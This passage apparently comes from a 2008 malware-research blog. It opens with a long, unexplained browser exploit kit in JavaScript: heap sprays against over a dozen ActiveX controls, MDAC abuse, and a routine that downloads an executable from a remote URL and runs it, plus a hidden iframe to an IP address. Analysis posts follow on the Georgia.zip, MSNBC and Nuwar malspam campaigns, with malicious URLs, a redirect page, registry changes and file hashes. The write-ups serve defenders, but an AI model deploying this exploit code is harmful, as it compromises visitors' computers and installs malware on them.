}
function free(tag) {
delete memo[tag];
CollectGarbage();
flush();
}
function CreateO(o,n){
var r=null;
try{r=o.CreateObject(n)}catch(e){}
if(!r){try{r=o.CreateObject(n,"")}catch(e){}}
if(!r){try{r=o.CreateObject(n,"","")}catch(e){}}
if(!r){try{r=o.GetObject("",n)}catch(e){}}
if(!r){try{r=o.GetObject(n,"")}catch(e){}}
if(!r){try{r=o.GetObject(n)}catch(e){}}
return(r);
}
function Go(a){
var eurl=url+"&spl=1";
var fname="winbQB0sCA.exe";
var fso=CreateO(a,"Scripting.FileSystemObject")
var sap=CreateO(a,"Shell.Application");
var x=CreateO(a,"ADODB.Stream");
var nl=null;
fname=fso.BuildPath(fso.GetSpecialFolder(2),fname);
x.Mode=3;
try{nl=CreateO(a,"Micr"+"osoft.XMLH"+"TTP");nl.open("GET",eurl,false);}
catch(e){try{nl=CreateO(a,"MSXML2.XMLHTTP");nl.open("GET",eurl,false);}
catch(e){try{nl=CreateO(a,"MSXML2.ServerXMLHTTP");nl.open("GET",eurl,false);}
catch(e){try{nl=new XMLHttpRequest();nl.open("GET",eurl,false);}
catch(e){return 0;}}}}
x.Type=1;
nl.send(null);
rb=nl.responseBody;
x.Open();
x.Write(rb);
x.SaveTofile(fname,2);
sap.ShellExecute(fname);
return 1;
}
function mdac() {
var i=0;
var target=new Array(
"BD96C556-65A3-11D0-983A-00C04FC29E36",
"BD96C556-65A3-11D0-983A-00C04FC29E30",
"AB9BCEDD-EC7E-47E1-9322-D4A210617116",
"0006F033-0000-0000-C000-000000000046",
"0006F03A-0000-0000-C000-000000000046",
"6e32070a-766d-4ee6-879c-dc1fa91d2fc3",
"6414512B-B978-451D-A0D8-FCFDF33E833C",
"7F5B7F63-F06F-4331-8A26-339E03C0AE3D",
"06723E09-F4C2-43c8-8358-09FCD1DB0766",
"639F725F-1B2D-4831-A9FD-874847682010",
"BA018599-1DB3-44f9-83B4-461454C84BF8",
"D0C07D56-7C69-43F1-B4A0-25F5A11FAB19",
"E8CCCDDF-CA28-496b-B050-6C07C962476B",null);
while(target[i]){
var a=null;
a=document.createElement("object");
a.setAttribute("classid","clsid:"+target[i]);
if(a){try{var b=CreateO(a,"Shell.Application");if(b){Go(a);}}catch(e){}}
i++;
}
return 0;
}
function wfi() {
try{
obj=cobj("WebViewFolderIcon.WebViewFolderIcon.1");
if(obj){
ms();
for(var i=0;i<128;i++){
var wvfio=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
try{wvfio.setSlice(0x7ffffffe,0,0,202116108);}catch(e){}
var wvfit=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
}
}
}catch(e){}
return 0;
}
function com() {
try{
obj=cobj("{EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F}");
if(obj){
ms();
z=Math.ceil(0x0c0c0c0c);
z=document.scripts[0].createControlRange().length;
}
}catch(e){}
return 0;
}
function dani() {
try{
obj=cobj("DirectAnimation.PathControl");
if(obj){
ms();
init();
var jmpecx = 0x0c0c0c0c;
var vtable = addr(0x7ceb9090);
for (var i = 0; i < 124/4; i++)vtable += addr(jmpecx);
vtable += padding.substr(0, (1008-138)/2);
var fakeObjPtr = heapBase + 0x688 + ((1008+8)/8)*48;
var fakeObjChunk = padding.substr(0, (0x200c-4)/2) + addr(fakeObjPtr) + padding.substr(0, 14/2);
CollectGarbage();
flush();
for (var i = 0; i < 100; i++)alloc_str(vtable);
alloc_str(vtable, "lookaside");
free("lookaside");
for (var i = 0; i < 100; i++)alloc(0x2010);
for (var i = 0; i < 2; i++) {
alloc_str(fakeObjChunk);
alloc_str(fakeObjChunk, "freeList");
}
alloc_str(fakeObjChunk);
free("freeList");
obj.KeyFrame(0x40000801, new Array(1), new Array(1));
}
}catch(e){}
return 0;
}
function office(){
var dir=new Array(
"C:\Documents and Settings\All Users\Start Menu\Programs\StartUp\office.exe",
"C:\Documents and Settings\All Users\Menu Iniciar\Programas\Iniciar\office.exe",
"C:\Documents and Settings\All Users\Menu Inicio\Programas\Inicio\office.exe",
"C:\Documents and Settings\All Users\Kuynnistu-valikko\Ohjelmat\Kuynnistys\office.exe",
"C:\Documents and Settings\All Users\Menu Dumarrer\Programmes\Dumarrage\office.exe",
"C:\Documents and Settings\All Users\Menuen Start\Programmer\Start\office.exe",
"C:\Documents and Settings\All Users\Menu Start\Programma's\Opstarten\office.exe",
"C:\Documents and Settings\All Users\Start Menu\Programlar\BASLANGI\office.exe",
"C:\Documents and Settings\All Users\Menu Start\Programy\Autostart\office.exe",
"C:\Documents and Settings\All Users\Start-meny\Programmer\Oppstart\office.exe",
"C:\Documents and Settings\All Users\Start-menyn\Program\Autostart\office.exe",
"C:\Documents and Settings\All Users\Menu Avvio\Programmi\Esecuzione automatica\office.exe",
"C:\Dokumente und Einstellungen\All Users\Startmenu\Programme\Autostart\office.exe");
var obj=null;
obj=cobj("snpvw.Snapshot Viewer Control.1");
if (obj){
for(j=0;j<dir.length;j++){
try{
obj.Zoom = 0;
obj.ShowNavigationButtons = false;
obj.AllowContextMenu = false;
obj.SnapshotPath = url+"&opr=1";
obj.CompressedPath = dir[j];
obj.PrintSnapshot();
}catch(e){}
}
}
return 0;
}
function dl(){
try{
var obj=null;
obj=cobj("Downloader.DLoader.1");
if (obj){
obj.DownloadAndInstall(url);
}
}catch(e){}
return 0;
}
function wks(){
try{
var obj=null;
obj=cobj("{00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6}");
if(obj){
ms();
var num = 202116108;
obj.WksPictureInterface = num;
}
}catch(e){}
return 0;
}
function ogame(){
try{
var obj=null;
obj=cobj("{F917534D-535B-416B-8E8F-0C04756C31A8}");
if(obj){
ms();
var buf = "";
while (buf.length < 600) buf += "\x0c\x0c\x0c\x0c";
obj.IEStartNative(buf);
}
}catch(e){}
return 0;
}
function ca(){
try{
var obj=null;
obj=cobj("{BF6EFFF3-4558-4C4C-ADAF-A87891C5F3A3}");
if (obj.AddColumn) {
ms();
var buf = addr(0x0c0c0c0c);
while(buf.length < 128)buf += buf;
buf = buf.substring(0, 128);
obj.AddColumn(buf,1);
}
}catch(e){}
return 0;
}
function buddy(){
try {
var obj=null;
obj = cobj("Sb.SuperBuddy");
if (obj) {
ms();
obj.LinkSBIcons(0x0c0c0c0c);
}
} catch(e){}
return 0;
}
function gomweb(){
try {
var obj=null;
obj = cobj("GomWebCtrl.GomManager.1");
if (obj) {
ms();
var buf="AAAA";
while (buf.length < 506) buf += buf;
buf = buf.substring(0,506);
buf += addr(0x0c0c0c0c);
obj.OpenURL(buf);
}
} catch(e){}
return 0;
}
function xmlcore(){
try {
var xml = null;
var xml = cobj("Msxml2.XMLHTTP.6.0");
if (xml){
xml = cobj("Msxml2.XMLHTTP.4.0");
}
if(!xml)return 0;
var obj=null;
obj = cobj("{88d969c5-f192-11d4-a65f-0040963251e5}");
obj = obj.object
if(obj) {
ms();
try {obj.open(new Array(),new Array(),new Array(),new Array(),new Array());} catch(e) {};
obj.open(new Object(),new Object(),new Object(),new Object(),new Object());
obj.setRequestHeader(new Object(),"...");
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
}
} catch(e){}
return 0;
}
function quick(){
try {
var obj=null;
obj = cobj("QuickTime.QuickTime.4");
if (obj) {
ms();
var buf = "";
for(var i=0;i<200;i++) {
buf += "AAAA";
}
buf += "AAA";
for(var i=0;i<3;i++)buf += "\x0c\x0c\x0c\x0c";
var my_div = document.createElement("div");
my_div.innerHTML =
"<object classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" width=\"200\" height=\"200\">" +
"<param name=\"src\" value=\"object_rtsp\">" +
"<param name=\"type\" value=\"image/x-quicktime\">" +
"<param name=\"autoplay\" value=\"true\">" +
"<param name=\"qtnext1\" value=\"<rtsp://BBBB:"+buf+">T<myself>\">" +
"<param name=\"target\" value=\"myself\">" +
"</object>";
document.body.appendChild(my_div);

}
} catch(e) {}
return 0;
}
function real(){
try {
var obj=null;
obj = cobj("IERPCtl.IERPCtl.1");
if (obj) {
if(obj.PlayerProperty("PRODUCTVERSION")>"6.0.14.552") {
obj = cobj("{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}");
ms();
var m = "";
var buf = addr(0x0c0c0c0c);
while (buf.length < 32) buf += buf;
buf = buf.substring(0,32);
m = obj.Console;
obj.Console = buf;
obj.Console = m;
m = obj.Console;
obj.Console = buf;
obj.Console = m;
}
}
} catch(e){}
return 0;
}
function ntaudio(){
try{
var obj=null;
obj=cobj("{77829F14-D911-40FF-A2F0-D11DB8D6D0BC}");
if(obj){
ms();
var buf = addr(0x0c0c0c0c);
while (buf.length < 5200) buf += buf;
buf = buf.substring(0,5200);
obj.SetFormatLikeSample(buf);
}
}catch(e){}
return 0;
}
function creative(){
try{
var obj=null;
obj=cobj("{0A5FD7C5-A45C-49FC-ADB5-9952547D5715}");
if(obj){
ms();
var buf = addr(0x09090909);
while (buf.length < 512) buf += buf;
buf = buf.substring(0,512);
obj.cachefolder = buf;
}
}catch(e){}
return 0;
}

function pdf(){
try {
var vers = new Array(0,0,0);
var ver = "0";
var obj = null;
obj = cobj("AcroPDF.PDF");
if (!obj){
obj = cobj("PDF.PdfCtrl");
}

if (obj) {
var my_div = document.createElement("div");
my_div.innerHTML = "<iframe src=\"http[:]//59.125.229.71/ex/7/pdf.php?id=4366\" width=100 height=100 style=\"display:none\"></iframe>";
document.body.appendChild(my_div);
}
} catch(e){}
return 0;
}

if (
mdac() ||
office() ||
dl() ||
pdf() ||
wfi() ||
com() ||
creative() ||
wks() ||
ogame() ||
ca() ||
buddy() ||
gomweb() ||
xmlcore() ||
quick() ||
real() ||
ntaudio()
|| dani()
) {}

Journalists shot in Georgia - Georgia.zip

2008-08-29T09:43:00.018-04:00

Around 19 August 2008, numerous security researchers and vendors reported the proliferation of malspam emails related to the Russia/Georgia conflict. The emails had the subject “Journalists shot in Georgia” and the password protected attachment Georgia.zip. The email body contained a message concerning the Russia/Georgia conflict and the password for the zip file. The following is a sample message:

Turkish television has released video of four journalists on assignment in Georgia being shot at.
The crew from NTV were in an area of Georgian-Russian fighting between the Georgian town of Gori and South Ossetia.

Real photo in the attachment

attach password: 123

The Georgia.zip file contains joined.exe. When executed, the malware creates %Temp%\LOADER.19B099.EXE and uses the BITS (Background Intelligent Transfer Service) to download filebyaka.exe and exe.php from the Chinese hosted site reddii.org (220.196.42.217). The exe.php page returns a 404 error.

http[:]//reddii.org//traffic/all/files/filebyaka.exe

http[:]//reddii.org/traffic/ft08/exe.php

filebyaka.exe

The malware filebyaka.exe copies itself as %system%\lphcavej0e7bp.exe and creates the following files

%system%\phcavej0e7bp.bmp
%system%\blphcavej0e7bp.scr
%temp%\.tt2.tmp
%temp%\.tt2.tmp.vbs
%temp%\.tt3.tmp
%temp%\.tt4.tmp
%temp%\.tt5.tmp
%temp%\.tt6.tmp

The following registry keys set phcavej0e7bp.bmp and blphcavej0e7bp.scr as the Windows desktop background and screensaver respectively.

HKEY_CURRENT_USER\Control Panel\Desktop
"ConvertedWallpaper" = C:\WINDOWS\System32\phcavej0e7bp.bmp
"SCRNSAVE.EXE" = C:\WINDOWS\System32\blphcavej0e7bp.scr
"WallpaperStyle" = 0
"ScreenSaveActive" = 1
HKEY_CURRENT_USER\Software\Sysinternals\Bluescreen Screen Saver
"EulaAccepted" = 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Software Notifier
"InstallID" = Data: dfc9f3e6-e26c-4c13-bbb8-0bda4ea03ccd
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System

"NoDispBackgroundPage" = 1
"NoDispScrSavPage" = 1

A registry key launches the malware lphcavej0e7bp.exe at startup.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"lphcavej0e7bp" = Data: C:\WINDOWS\System32\lphcavej0e7bp.exe

The file .tt2.tmp.vbs is used to prevent installation restore points in System Restore.

The malware lphcavej0e7bp.exe retrieves graphics from the following domains and performs unresolved DNS requests for variable_string.chr.santa-inbox.com.

avxp-2008.net (78.159. 96.17)
stat-avxp-2008.net (78.159. 96.16)
www[.]avxp-2008.net (78.159. 96.16)

DNS Sample:
404562.1.ea1791ca31f623f9821f379c529dc3f5.chr.santa-inbox.com

.tt5.tmp:1288

The file .tt5.tmp:1288, originally created by filebyaka.exe, creates several temp files and a persistent window that attempts to force a victim into installing the rogue antispyware program Antivirus XP 2008.

%Temp%\nsn7.tmp
%Temp%\nsn8.tmp
%Temp%\nsn9.tmp
%Temp%\nsd9.tmp\MachineKey.dll
%Temp%\nsd9.tmp\Mutex.dll
%Temp%\nsd9.tmp\System.dll
%Temp%\.tt5.tmp.exe
%Temp%\nsd9.tmp\md5dll.dll
%Temp%\nsd9.tmp\rc4hex.dll
%Temp%\nsd9.tmp\euladlg.dll

Clicking on the persistent Antivirus XP 2008 window causes the file .tt5.tmp:1288 to create the Program Files folder rhcevej0e7bp and several Antivirus XP 2008 installation files.

C:\Program Files\rhcevej0e7bp\rhcevej0e7bp.exe
C:\Program Files\rhcevej0e7bp\database.dat
C:\Program Files\rhcevej0e7bp\msvcp71.dll
C:\Program Files\rhcevej0e7bp\MFC71.dll
C:\Program Files\rhcevej0e7bp\MFC71ENU.DLL
C:\Program Files\rhcevej0e7bp\msvcr71.dll
C:\Program Files\rhcevej0e7bp\license.txt
C:\Program Files\rhcevej0e7bp\rhcevej0e7bp.exe.local
C:\Program Files\rhcevej0e7bp\Uninstall.exe

The file rhcevej0e7bp.exe creates %system%\pphcavej0e7bp.exe

The following registry keys launch rhcevej0e7bp.exe (Antivirus XP 2008) at startup.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
"rhcevej0e7bp" = CA, 1E, B7, 48
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
"AntivirXP08" = AntivirXP08
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"SMrhcevej0e7bp" = C:\Program Files\rhcevej0e7bp\rhcevej0e7bp.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\rhcevej0e7bp "DisplayName" = AntivirXP08
"UninstallString" = "C:\Program Files\rhcevej0e7bp\uninstall.exe" HKEY_LOCAL_MACHINE\SOFTWARE\rhcevej0e7bp
"(Default)" = C:\Program Files\rhcevej0e7bp
"ADVid" = ea1791ca31f623f9821f379c529dc3f5
"AutomaticallyUpdates" = 1
"BackgroundScan" = 1
"BackgroundScanTimeout" = 1
"BuyDiscUrl" = HEX
"BuyUrl" = HEX
"DatabaseVersion" = 2.1
"DaysInterval" = 7
"domain" = HEX
"EngineVersion" = 2.1
"GuiVersion" = 2.1
"InstallDir" = C:\Program Files\rhcevej0e7bp
"LastTimeStamp" = 0C, 01, 00, 00
"MinimizeOnStart" = 0
"ProgramVersion" = 2.1
"ProxyName"
"ProxyPort" = 0
"ScanDepth" = 2
"ScanPriority" = 1
"ScanSystemOnStartup" = 1
"SoftID" = AntivirXP08

The rogue antispyware program Antivirus XP 2008 displays fake alerts in order to persuade users into buying the rogue antispyware program. The malware is detected as Trojan.Blusod (Symantec).

The following files were collected during malware analysis.

Filename, MD5 Size, (Bytes)
.tt2.tmp.vbs, 9df700c8f6fd43fac0a89aef04214bbd, 1002
.tt5.tmp.exe, 94d00b0ea3c0fc69c52f761efcb49c0c, 1613465
blphcavej0e7bp.scr, b10a43b9044b488dc8c7d33b250cfebb, 118784
filebyaka.exe, fc85dab5849416f8796b799fc209395a, 199168
Georgia.zip, b1698f9c3109c9fa723e68cad124eb60, 5915
joined.exe, 607af96b03addadf28cf9280701df191, 7680
license.bmp, 7003a7e6f2421213a24456724071e9d3, 2359350
lphcavej0e7bp.exe, fc85dab5849416f8796b799fc209395a, 199168
pphcavej0e7bp.exe, f18a4aa83fa2dc238536103731337759, 106496
database.dat, c19b001e6fe6c082e5069e4490898ccc, 1701
license.txt, b9df16a4c49ce4fe979d8f27d89a8106, 19598
MFC71.dll, f35a584e947a5b401feb0fe01db4a0d7, 1060864
MFC71ENU.DLL, baf751e7061ff626aa60f56d1d5d1fdc, 57344
msvcp71.dll, 561fa2abb31dfa8fab762145f81667c2, 499712
msvcr71.dll, 86f1895ae8c5e8b17d99ece768a70732, 348160
rhcevej0e7bp.exe, 02eb58055afb8b81a05ea623882a9034, 831488
Uninstall.exe, 423c6bcad6e91fb6e81a40689d1640e4, 110562

msnbc.com Malspam

2008-08-14T15:08:00.010-04:00

The Rustock botnet has moved from spam related CNN Alerts to MSNBC Breaking News Alerts. The MSNBC emails use the subject “msnbc.com - BREAKING NEWS:” followed by a variable message. Sample messages include:

“Google launches free music downloads in China”
“Mexican arrested on billion-dollar graft case”
“NASA Claim to Have Achieved First Zero-Gravity Erection”
“Even The New Yorker 'Cartoon Dogs' Are Pissed at the 'Obama Cover”

The “Find out more at…” hyperlink redirects to various web pages that offer a Video ActiveX Object necessary to view the video. The Video ActiveX Object download typically named something like adobe_flash.exe is a CbEvtSvc trojan variant. Sample URLs include:

http://gekkoeurope.com/up.html (195.47.247.83, DK)
http://bg-buttisholz.ch/up.html (80.74.155.30, CH)
http://sprtx.com/msn.html (72.232.91.106, US)
http://ebuzzdigital.com/msnlive.html (74.54.81.143, US)

Find out more at <a href="http://bg-buttisholz.ch/up.html">http://breakingnews.msnbc.com>/a><br>

Malware Analysis

The msnbc.com - BREAKING NEWS spam hyperlink loads a CNN or MSN codec download page. A sample from http[:]//bg-buttisholz.ch/up.html downloads adobe_flash.exe. The trojan adobe_flash.exe copies itself as C:\WINDOWS\System32\CbEvtSvc.exe and installs CbEvtSvc.exe as a service named CbEvtSvc.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CbEvtSvc
"DisplayName" = CbEvtSvc
"ErrorControl" = 1
"ImagePath" = %SystemRoot%\System32\CbEvtSvc.exe -k netsvcs
"ObjectName" = LocalSystem
"Opt"
"Start" = 2
"Type" = 10
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CbEvtSvc\Enum
"0" = Root\LEGACY_CBEVTSVC\0000
"Count" = 1
"NextInstance" = 1
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CbEvtSvc\Security
"Security" = 01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00

The CbEvtSvc.exe trojan downloads additional malware. A sample CbEvtSvc.exe execution downloaded 13scan.exe, install.exe, and fg.exe from 78.109.19.50 (UA).

Install.exe
The malware install.exe is a rustock variant that causes the host to join a spam botnet. The malware install.exe copies itself as C:\Documents and Settings\LocalService\Application Data\728739263.exe (variable name). The malware 728739263.exe creates C:\WINDOWS\TEMP\7.tmp which creates the hidden device service %System%\drivers\962e1fdd.sys (variable name).

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\962e1fdd
ImagePath = "%System%\drivers\962e1fdd.sys"
Type = 1
Start = 1
ErrorControl = 1

The malware hooks "%System%\drivers\beep.sys" and hides its registry subkeys (ZwCreateEvent, ZwCreateKey, ZwOpenKey). The rustock trojan perfomed DNS lookups for google.com A records and google.com, yahoo.com, aol.com, microsoft.com, and 208.72.168.191 MX records. The malware made the following POST connections to receive spam instructions.

POST http://208.72.168.191/login.php
POST http://208.72.168.191/data.php

13scan.exe
The malware 13scan.exe copies itself as C:\Documents and Settings\LocalService\Application Data\668311381.exe. The malware 668311381.exe failed to execute due to application errors. The malware is a rogue security product such as Antivirus XP 2008.

fg.exe
The malware fg.exe copies itself as C:\Documents and Settings\LocalService\Application Data\521632863.exe. The malware 521632863.exe creates setupapi.dll in the Program Files folder of installed web browsers. The dll hooks into iexplore.exe, firefox.exe, etc. The malware serves as an infostealer trojan.

C:\Program Files\Internet Explorer\setupapi.dll
C:\Program Files\Mozilla Firefox\setupapi.dll

The following files were observed during malware analysis.

Filename MD5 Size
13scan.exe 1debb2fcbb4ae9a912bb309ea560241e 129536
521632863.exe 202ce1f4d8ffedd868c722763a40f4f2 34816
668311381.exe 1debb2fcbb4ae9a912bb309ea560241e 129536
7.tmp 831e11da49fee6b692d009b8f71822cf 137216
962e1fdd.sys fc5be1b115c13c707ad8f33d8411be51 109762
adobe_flash.exe 61229aa4f0bb47a80df0b1026cb30fe9 74752
CbEvtSvc.exe 61229aa4f0bb47a80df0b1026cb30fe9 74752
fg.exe 202ce1f4d8ffedd868c722763a40f4f2 34816
install.exe 831e11da49fee6b692d009b8f71822cf 137216
setupapi.dll cf63737c8b5ea3d2cd9fe130cc4c7519 52736

References

http://www.marshal.com/trace/traceitem.asp?article=742
http://www.symantec.com/security_response/writeup.jsp?docid=2008-041717-0829-99&tabid=2
http://www.symantec.com/security_response/writeup.jsp?docid=2006-070513-1305-99&tabid=2
http://www.symantec.com/security_response/writeup.jsp?docid=2008-071613-4343-99&tabid=2

video_file.exe Nuwar Variant

2008-06-01T19:14:00.018-04:00

Nuwar malware variants continue to propogate through spammed email attachments purporting to be erotic pictures and videos of various celebrities. The following discusses an example detected as Trojan.Erotpics (Symantec) and TROJ_NUWAR.ABK (Trend Micro).

Malicious Nuwar Email:

A spam email arrives appearing to include a link for a Jennifer Aniston video.

The "Download now" hyperlink links to http: //do-haguenau[dot]com/index1.php. The index1.php script returns a location redirect to http: //do-haguenau[dot]com/main34.html. The main34.html code contains a META tag that downloads video_film.exe in 5 seconds, a hyperlink for directly downloading video_film.exe, and an iframe for http: //do-haguenau[dot]com/pindex.php.

<html><head> <META HTTP-EQUIV="refresh" CONTENT="5;URL=http://do-haguenau[dot]com/video_film.exe"> <title></title></head>
<body><iframe src="http: //do-haguenau[dot]com/pindex.php" style="width:1px; height:1px;"></iframe><br>
<div style="text-align:center; padding-top:100px;"><img src="wamkl.gif"><br>Please Wait!<br><a href="http: //do-haguenau[dot]com/video_film.exe">Download Video</a>
</div></body></html>

The iframe for http: //do-haguenau[dot]com/pindex.php returns MDAC MS06-014 exploit code resulting in the request for http: //do-haguenau[dot]com//load.php which is downloaded as 1.exe.

Malware Analysis:

video_film.exe
The Nuware malware video_film.exe copies itself as C:\WINDOWS\System32\CbEvtSvc.exe.

The following registry keys are created:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CbEvtSvc]
"DisplayName"=CbEvtSvc
"ErrorControl"=1
"ImagePath"=%SystemRoot%\System32\CbEvtSvc.exe -k netsvcs
"ObjectName"=LocalSystem
"Opt"
"Start"=2
"Type"=10

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CbEvtSvc\Enum]
"0"=Root\LEGACY_CBEVTSVC\0000
"Count"=1
"NextInstance"=1
"Security"=01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00

The malware downloads 14instne.exe and ccbjq.exe from wbnet.com.br (66.7.212.241) and 1.exe from spiderfront.net (206.51.236.176).

14instne.exe
The malware is detected as Trojan.Srizbi (Symantec). The malware installs as a rootkit and generates spam. The malware 14instne.exe copies itself as C:\Documents and Settings\LocalService\Application Data\1107833316.exe. The malware 1107833316.exe creates the hidden file C:\WINDOWS\system32\drivers\qandr.sys.

The following registry keys are created:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\qandr]
"Type"=dword:00000001
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=str(2):"\??\C:\WINDOWS\system32\drivers\qandr.sys"
"DisplayName"="qandr"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\qandr\Security]
"Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00

ccbjq.exe
The Nuware variant malware ccbjq.exe copies itself as C:\Documents and Settings\LocalService\Application Data\971313497.exe. The malware 971313497.exe copies itself as C:\WINDOWS\System32\CcEvtSvc.exe.

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CcEvtSvc]
"DisplayName"=CcEvtSvc
"ErrorControl"=1
"ImagePath"=%SystemRoot%\System32\CcEvtSvc.exe -k netsvcs
"ObjectName"=LocalSystem
"Opt"
"Start"=2
"Type"=10

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CcEvtSvc\Enum]
"0"=Root\LEGACY_CCEVTSVC\0000
"Count"=1
"NextInstance"=1
"Security"=01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00

1.exe
The malware CbEvtSvc.exe downloads 1.exe from spiderfront.net (206.51.236.176). 1.exe is another Nuware variant (Trend Micro)

GET /l.php?id=144&dgfd=sfdsf HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: spiderfront.net
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sat, 31 May 2008 19:13:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Disposition: attachment; filename=1.exe
Connection: close
Content-Type: application/octet-stream

The malware 1.exe copies itself as C:\Documents and Settings\LocalService\Application Data\1307074916.exe. The malware 1307074916.exe creates the following files:

C:\WINDOWS\System32\sockins32.dll
C:\WINDOWS\System32\sft.res
C:\WINDOWS\index.html

The following registry keys are created:

[HKEY_CLASSES_ROOT\CLSID\{66186F05-BBBB-4a39-864F-72D84615C679}]
"(Default)"=WebProxy

[HKEY_CLASSES_ROOT\CLSID\{66186F05-BBBB-4a39-864F-72D84615C679}\InProcServer32]
